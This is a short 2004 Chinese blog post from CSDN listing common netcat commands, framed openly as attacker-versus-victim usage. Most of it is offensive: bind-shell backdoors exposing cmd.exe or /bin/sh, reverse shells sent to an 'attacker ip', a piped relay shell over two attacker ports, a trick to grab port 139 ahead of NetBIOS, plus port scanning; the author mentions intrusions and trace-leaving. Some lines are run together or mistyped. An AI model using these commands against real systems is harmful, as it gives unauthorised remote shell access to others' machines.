CSDN博客

img ycool1984

NC常用的使用命令

发表于2004/9/14 4:50:00  1598人阅读

本人对NC也不怎么熟悉,只知道几个命令的功能。

端口的刺探:
nc -vv ip port
RIVER [192.168.0.198] 19190 (?) open //显示是否开放open
3.2.扫描器
nc -vv -w 5 ip port-port port
nc -vv -z ip port-port port
这样扫描会留下大量的痕迹,在没扫描器的时候使用。 :)

后门
victim machine:  victim(受害者) machine(机器)呵呵我E文不好,标出来自己好认。
nc -l -p port -e cmd.exe //win2000
nc -l -p port -e /bin/sh //unix,linux
attacker machine: //攻击者的机器.
nc ip -p port //连接victim_IP,然后得到一个shell。

反向连接

nc -vv -l -p port
victim machine:
nc -e cmd.exe attacker ip -p port
nc -e /bin/sh attacker ip -p portattacker machine:
nc -vv -l -p port1 /*用于输入*/
nc -vv -l -p prot2 /*用于显示*/
victim machine:
nc attacker_ip port1 | cmd.exe | nc attacker_ip port2
nc attacker_ip port1 | /bin/sh | nc attacker_ip port2 (linux系统使用,不过我还没有入侵过linux系统,linux学的太差了)139要加参数-s(nc.exe -L -p 139 -d -e cmd.exe -s 对方机器IP)
这样就可以保证nc.exe优先于NETBIOS。

端口数据抓包.
nc -vv -w 2 -o test.txt www.xfocus.net 80 21-15

?


?

?

0 0

相关博文

我的热门文章

img
取 消
img